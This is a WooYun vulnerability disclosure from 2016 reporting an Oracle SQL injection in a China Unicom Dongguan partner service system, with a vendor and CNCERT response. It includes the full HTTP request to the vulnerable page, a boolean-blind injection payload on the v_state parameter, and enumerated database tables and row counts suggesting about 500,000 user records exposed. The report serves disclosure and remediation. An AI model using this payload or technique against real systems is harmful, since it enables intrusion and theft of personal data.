当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169912

漏洞标题:中国联通某站Oracle注入(涉及24个库50W用户信息)

相关厂商:中国联通

漏洞作者: Looke

提交时间:2016-01-14 16:56

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

RT

详细说明:

漏洞系统:中国联通东莞分公司合作伙伴服务系统
系统地址:http://**.**.**.**/
弱口令登陆:
发现注入点:

注入点.png


漏洞地址:

GET /webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v_state=%27%D3%D0%D0%A7%27&v_flag= HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Referer: http://**.**.**.**/webout/kw/top.jsp?v_flag=
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=183FBB8776B8BB62763FE24A981885DF; csd=36000100; cod=36000050; LastVisitusername=100030


v_state参数存在注入

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v
_state='%D3%D0%D0%A7') AND 3529=3529 AND (3172=3172&v_flag=
---
[20:23:10] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle

漏洞证明:

24个数据库:

数据库.png


Database: WF
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| WORKFLOW_PROC_DETAIL | 305855 |
| WORKFLOW_PROC_LOG | 299811 |
| WORKFLOW_PROC | 240127 |
| SENDSMS_LOG | 233827 |
| WORKFLOW_HIS | 169942 |
| WORKFLOW | 67805 |
| WORKFLOW_PROC_DETAIL_HIS | 5606 |
| WORKFLOW_PROC_HIS | 5593 |
| WORKDAY | 3288 |
| WORKDAY2015 | 2922 |
| WORKFLOW_PROC_CUR | 1846 |
| WORKFLOW_PROC_LOG_HIS | 36 |
| WORKFLOW_ATTACH | 19 |
| WORKFLOW_PROC_MODEL | 15 |
| CODE_PROCESS_TYPE | 11 |
| CODE_STATUS | 11 |
| CODE_WORKFLOW_TYPE | 9 |
| CODE_CONTENT_TYPE | 8 |
| WORKFLOW_ADDSQL_ERRLOG | 8 |
| WORKFLOW_TYPE_AUTH | 4 |
| WORKFLOW_ATTACH_HIS | 1 |
+--------------------------------+---------+
Database: CLUB
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| CLUN_MEMBER_DATAVALUE | 4596169 |
| CLUB_MEMBER_DATASUM | 302553 |
| CLUB_MEMBER_GPRS | 245692 |
| TC_SELLER_MEMBER_NEW | 20174 |
| CLUB_BM | 17102 |
| CLUB_MEMBER | 9360 |
| CLUB_PLANS | 6724 |
| CLUB_MEMBERPONIT | 5477 |
| CLUB_INFO_USER | 5264 |
| V_12 | 1271 |
| V_1 | 1269 |
| CLUB_LECTURERPOINT | 1218 |
| CLUB_SUMMARY | 747 |
| CLUB_NEWS | 650 |
| CLUB_DOWNLOAD | 524 |
| CLUB_EXPERT_INFO | 134 |
| CLUB_KC | 100 |
| CLUB_PHOTO | 96 |
| CLUB_WZDG | 86 |
| CLUB_BASE_INFO | 67 |
| CLUB_KETANG | 66 |
| CLUB_QUESTION | 49 |
| CLUB_DAREN | 48 |
| CLUB_VIDEO | 35 |
| CLUB_ACTIVITIES | 31 |
| CLUB_TOWN | 30 |
| V_TEMP4 | 23 |
| V_PPPP | 21 |
| CLUB_PHONE | 16 |
| CLUB_JIEKOUREN | 15 |
| CLUB_CODE | 10 |
| CLUB_PHOTOTYPE | 9 |
| CLUB_NEWSTYPE | 6 |
| CLUB_OS | 4 |
| CLUB_QUESTIONTYPE | 4 |
| CLUB_LIUYAN | 2 |
| CLUB_BASESET | 1 |
| CLUB_INTEGRALRULES | 1 |
| CLUB_INTEGRALTYPES | 1 |
| CLUB_LOGINUSERS | 1 |
| CLUB_NEWSPIC | 1 |
| CLUB_WEBBASESET | 1 |
| CLUB_ZHUANJIA | 1 |
| CLUB_ZHUANJIANEWS | 1 |
+--------------------------------+---------+
Database: APEX_030200
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| WWV_FLOW_DICTIONARY$ | 70601 |
| WWV_FLOW_STEP_ITEMS | 9671 |
| WWV_FLOW_REGION_REPORT_COLUMN | 7903 |
| WWV_FLOW_PAGE_PLUGS | 7416 |
| WWV_FLOW_STEP_ITEM_HELP | 6335 |
| WWV_FLOW_LIST_OF_VALUES_DATA | 4184 |
| WWV_FLOW_MESSAGES$ | 3706 |
| WWV_FLOW_STEP_BUTTONS | 3513 |
| WWV_FLOW_STEP_BRANCHES | 3255 |
| WWV_FLOW_LIST_ITEMS | 3048 |
| WWV_FLOW_STEP_PROCESSING | 2238 |
| WWV_FLOW_STEP_VALIDATIONS | 1990 |
| WWV_FLOW_STEPS | 1754 |
| WWV_FLOW_MENU_OPTIONS | 1452 |
| WWV_FLOW_STEP_COMPUTATIONS | 984 |
| WWV_FLOW_LISTS_OF_VALUES$ | 959 |
| WWV_FLOW_WORKSHEET_COLUMNS | 721 |
| WWV_FLOW_LISTS | 601 |
| WWV_FLOW_REGION_UPD_RPT_COLS | 439 |
| WWV_FLOW_STANDARD_ICONS | 319 |
| WWV_FLOW_COUNTRIES | 240 |
| WWV_FLOW_TRANSLATABLE_COLS$ | 232 |
| WWV_FLOW_SW_MAIN_KEYWORDS | 199 |
| WWV_FLOW_PAGE_PLUG_TEMPLATES | 166 |
| WWV_FLOW_LANGUAGES | 132 |
| WWV_FLOW_LIST_TEMPLATES | 105 |
| WWV_FLOW_PAGE_GROUPS | 105 |
| WWV_FLOW_DUAL100 | 100 |
| WWV_FLOW_LANGUAGE_MAP | 90 |
| WWV_FLOW_ITEMS | 89 |
| WWV_FLOW_UPGRADE_PROGRESS | 89 |
| WWV_MIG_RESERVED_WORDS | 87 |
| WWV_FLOW_TEMPLATES | 64 |
| WWV_FLOW_HNT_COLUMN_INFO | 58 |
| WWV_FLOW_ROW_TEMPLATES | 54 |
| WWV_FLOW_RESTRICTED_SCHEMAS | 46 |
| WWV_FLOW_PROCESSING | 45 |
| WWV_MIG_FRM_OLB_XMLTAGTABLEMAP | 45 |
| WWV_FLOW_PAGE_GENERIC_ATTR | 44 |
| WWV_FLOW_RANDOM_IMAGES | 42 |
| WWV_FLOW_UPG_TAB_NAME_CHANGES | 42 |
| WWV_FLOW_SHORTCUTS | 39 |
| WWV_FLOW_ALT_CONFIG_PICK | 37 |
| WWV_FLOW_FIELD_TEMPLATES | 36 |
| WWV_MIG_FRM_XMLTAGTABLEMAP | 36 |
| WWV_FLOW_CHARSETS | 32 |
| WWV_FLOW_COMPANY_TYPES | 32 |
| WWV_FLOW_WORKSHEET_RPTS | 30 |
| WWV_FLOW_WORKSHEETS | 30 |
| WWV_FLOW_STANDARD_CSS | 27 |
| WWV_FLOW_PLATFORM_PREFS | 21 |
| WWV_FLOW_SECURITY_SCHEMES | 19 |
| WWV_FLOW_QUERY_COLUMN | 18 |
| WWV_FLOW_UPG_TAB_OBSOLETE | 17 |
| WWV_MIG_RPT_XMLTAGTABLEMAP | 15 |
| WWV_FLOW_COMPUTATIONS | 14 |
| WWV_FLOW_WORKSPACE_REQ_SIZE | 14 |
| WWV_FLOW_BUTTON_TEMPLATES | 12 |
| WWV_FLOW_ICON_BAR | 12 |
| WWV_FLOW_CALS | 11 |
| WWV_FLOW_CUSTOM_AUTH_SETUPS | 11 |
| WWV_FLOW_BANNER | 10 |
| WWV_FLOW_POPUP_LOV_TEMPLATE | 10 |
| WWV_FLOW_SW_CREATE_KEYWORDS | 10 |
| WWV_FLOW_THEMES | 10 |
| WWV_FLOWS | 10 |
| WWV_FLOW_CAL_TEMPLATES | 9 |
| WWV_FLOW_DEVELOPER_ROLES | 9 |
| WWV_FLOW_PATCHES | 9 |
| WWV_FLOW_HNT_TABLE_INFO | 8 |
| WWV_FLOW_MENU_TEMPLATES | 8 |
| WWV_FLOW_SW_SQLPLUS_CMD | 8 |
| WWV_FLOW_MENUS | 7 |
| WWV_MIG_MENU_XMLTAGTABLEMAP | 7 |
| WWV_FLOW_LOV_VALUES | 6 |
| WWV_FLOW_QUERY_CONDITION | 6 |
| WWV_FLOW_QUERY_DEFINITION | 6 |
| WWV_FLOW_QUERY_OBJECT | 6 |
| WWV_FLOW_FLASH_CHART_SERIES | 5 |
| WWV_FLOW_FLASH_CHARTS | 5 |
| WWV_FLOW_PICK_PAGE_VIEWS | 5 |
| WWV_FLOW_TOPLEVEL_TABS | 5 |
| WWV_MIG_EXPORTER | 5 |
| WWV_FLOW_PICK_END_USERS | 4 |
| WWV_FLOW_SW_SET_KEYWORDS | 4 |
| WWV_COLUMN_EXCEPTIONS | 3 |
| WWV_FLOW_COMPANIES | 3 |
| WWV_FLOW_TABS | 3 |
| WWV_FLOW_TREES | 3 |
| WWV_FLOW_INSTALL | 2 |
| WWV_FLOW_STANDARD_JS | 2 |
| WWV_FLOW_ACTIVITY_LOG_NUMBER$ | 1 |
| WWV_FLOW_APPLICATION_GROUPS | 1 |
| WWV_FLOW_CLICKTHRU_LOG_NUMBER$ | 1 |
| WWV_FLOW_COMPANY_SCHEMAS | 1 |
| WWV_FLOW_DB_AUTH | 1 |
| WWV_FLOW_FND_USER | 1 |
| WWV_FLOW_PASSWORD_HISTORY | 1 |
| WWV_FLOW_USER_ACCESS_LOG_NUM$ | 1 |
+--------------------------------+---------+
Database: PLANRUN
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| MONITOR_SQL_IMPORT | 3 |
+--------------------------------+---------+
Database: LIUXIONGHUI
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| V_TEMP22 | 194 |
+--------------------------------+---------+
Database: CYEC
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| T6_CODE | 20000 |
| T6_IPSTORE | 18395 |
| T6_SYS_DAYLOOK_IP | 643 |
| WEIXIN | 602 |
| T6_MEMBER | 342 |
| T6_ABLUM_PHOTO | 320 |
| MMS_SENDLOG | 207 |
| T6_INTEN_SCORE | 203 |
| T6_NEWS | 112 |
| T6_WXM | 46 |
| T6_KKMEMBER | 43 |
| T6_COM | 39 |
| T6_FAV | 34 |
| T6_VIDEO_CLUB | 34 |
| T6_SCHOOL | 29 |
| T6_INTEN_OBJECT | 25 |
| T6_LOGIN | 23 |
| T6_WXSET | 23 |
| T6_SHOP | 21 |
| T6_INTEN_LEADER | 19 |
| T6_INTEN_REPORT | 18 |
| T6_SECONDKILL | 16 |
| T6_IMG | 12 |
| T6_GUA | 11 |
| T6_ANSWER | 10 |
| T6_INTENDANCE | 10 |
| T6_SCORE | 10 |
| T6_ACTIVE_BOOK | 9 |
| T6_QR | 9 |
| T6_SHOP_ORDER | 8 |
| T6_CA | 7 |
| T6_NEWS_COMMENT | 7 |
| T6_REWARD | 7 |
| T6_ORDER | 6 |
| T6_SYS_DAYLOOK | 6 |
| T6_ACTIVE | 5 |
| T6_QUESTION | 4 |
| T6_SYS_MEMBER | 4 |
| T6_PORDER | 3 |
| T6_QTERM | 2 |
| T6_REWARDTYPE | 2 |
| T6_SKTERM | 2 |
| T6_APPLY | 1 |
| T6_KK_ABLUM | 1 |
| T6_PRO | 1 |
+--------------------------------+---------+
Database: LT
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| CJWEB | 12530 |
| CJWAP | 3904 |
| T1 | 828 |
| CJMINI | 388 |
| PRODUCT | 325 |
| NEWS | 160 |
| MOBILENO | 100 |
| CJMOBILE | 27 |
| PUR | 21 |
| DL | 19 |
| LINKS | 11 |
| DETAIL186 | 5 |
| AD | 4 |
| HOMEFLASH | 4 |
| CJ | 3 |
| USERS | 2 |
| BRAND | 1 |
| CJRULE | 1 |
+--------------------------------+---------+
Database: ORDDATA
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| ORDDCM_DICT_ATTRS | 2418 |
| ORDDCM_STD_ATTRS | 2415 |
| ORDDCM_UID_DEFS | 245 |
| ORDDCM_CT_LOCATORPATHS | 95 |
| ORDDCM_CT_DAREFS | 72 |
| ORDDCM_CT_PRED | 61 |
| ORDDCM_CT_PRED_OPRD | 53 |
| ORDDCM_INTERNAL_TAGS | 42 |
| ORDDCM_ANON_ATTRS | 37 |
| ORDDCM_VR_DT_MAP | 32 |
| ORDDCM_PREFS_LOOKUP | 13 |
| ORDDCM_RT_PREF_PARAMS | 13 |
| ORDDCM_CT_PRED_SET | 9 |
| ORDDCM_DOCS | 9 |
| ORDDCM_INSTALL_DOCS | 9 |
| ORDDCM_DOC_TYPES | 8 |
| ORDDCM_CT_ACTION | 7 |
| ORDDCM_DOC_REFS | 7 |
| ORDDCM_ANON_ACTION_TYPES | 4 |
| ORDDCM_ANON_RULE_TYPES | 3 |
| ORDDCM_ANON_RULES | 3 |
| ORDDCM_CT_PRED_PAR | 3 |
| ORDDCM_PRV_ATTRS | 3 |
| ORDDCM_CT_MACRO_PAR | 2 |
| ORDDCM_CT_MACRO_DEP | 1 |
| ORDDCM_DATA_MODEL | 1 |
| ORDDCM_MAPPING_DOCS | 1 |
+--------------------------------+---------+
Database: WEBOUT
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| P_ACCESS_LOG | 3356013 |
| TF_B_ACCESSLOG | 1874463 |
| P_LOGIN_LOG | 1785945 |
| TF_B_PAYLOG | 1587447 |
| ADMOBILE_ADSL | 402082 |
| P_USER_SINGLEPWD | 106366 |
| P_CODE_USER | 102024 |
| P_USER_ROLE | 83755 |
| CLUB_VIP_USER | 80805 |
| TC_SP_YIJIANTONG | 73825 |
| P_USER_ROLE_20140523 | 63915 |
| P_CODE_USER_20120410 | 58262 |
| P_USER_ROLE_20120410 | 48912 |
| WEB_SERVICE_PORT_LOG | 16933 |
| MEMBER_LOG | 12710 |
| JYSL_PROCLOG | 7100 |
| ADMOBILE_MOBILE | 6737 |
| P_CODE_USER_20111220 | 5658 |
| JYSL | 3391 |
| WAP_ACCESS_LOG | 3255 |
| P_ROLE_RIGHT_20120410 | 1608 |
| CLUB_VIP_QP_LOG | 1386 |
| P_ROLE_RIGHT | 1289 |
| P_ROLE_RIGHT_20140523 | 1263 |
| JYSL_RES_MOBILE | 999 |
| JZSL_RES_MOBILE | 978 |
| JYSL_FLOW_MAN | 935 |
| MEMBER_SCORE | 680 |
| P_CODE_RIGHT | 448 |
| P_CODE_RIGHT_20120410 | 445 |
| P_CODE_RIGHT_20140523 | 438 |
| TC_ZZTJ_MOBILETYPE_BAK | 356 |
| JYSL_AD_PHOTO | 234 |
| WAP_ZZTJ_LOG | 222 |
| LIANGHAO_REC | 167 |
| LIANGHAO_NO | 130 |
| P_UPLOAD_FILE | 106 |
| CLUB_VIP_QP | 104 |
| JYSL_AD | 94 |
| JZSL_OPER | 88 |
| CLUB_VIP_QP_SHUIGUO | 80 |
| P_CODE_ROLE | 80 |
| DL_RESOURCE | 76 |
| P_CODE_ROLE_20120410 | 76 |
| JYSL_YD_DINNER | 74 |
| JYSL_MOBILE | 31 |
| JZSL_DEPT | 26 |
| DG_WDGF | 24 |
| TEMP_USER | 22 |
| WEB_SERVICE_PORT_RET | 22 |
| JZSL_SALESHOP_CFG | 21 |
| JR_JIFEN_LOG | 17 |
| JYSL_FILE | 15 |
| CLUB_CINEMA | 13 |
| JYSL_FLOW | 13 |
| P_CODE_DEPT | 12 |
| JZSL_RES_MOBILE_SELECT | 11 |
| CLUB_CINEMA_NUMBER | 10 |
| P_CODE_AREA | 10 |
| ADMOBILE_ITEM | 8 |
| CLUB_FILM_YD | 7 |
| P_PUB_INFO | 7 |
| DL_RESOURCE_LOG | 6 |
| WEB_SERVICE_PORT | 5 |
| CLUB_CINEMA_TASK | 3 |
| JZSL_FLOW_MODEL | 3 |
| P_UPLOAD_FILE_TYPE | 3 |
| JYSL_MOBILE_FEE_IMPORT | 2 |
| JYSL_ORDER_FILE | 2 |
| P_CODE_APP | 2 |
| XSQD_PUBINFO | 2 |
| CLUB_FILM_DH | 1 |
| DG_TEST | 1 |
| JYSL_MOBILE_FEE | 1 |
| JZSL_AGENT | 1 |
| JZSL_AGENT_BIZ | 1 |
| JZSL_BIZ_TYPE | 1 |
| JZSL_FLOW_CURRENT | 1 |
| JZSL_FLOW_CURRENT_OPER | 1 |
| JZSL_MOBILE_POOL | 1 |
| JZSL_ORDER | 1 |
| JZSL_ORDER_FILE | 1 |
| WO_DETAINMENT | 1 |
| XSQD_PUBINFO_FILE | 1 |
+--------------------------------+---------+


50W用户信息

用户信息1.png


用户表2.png

修复方案:

版权声明:转载请注明来源 Looke@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-18 18:41

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无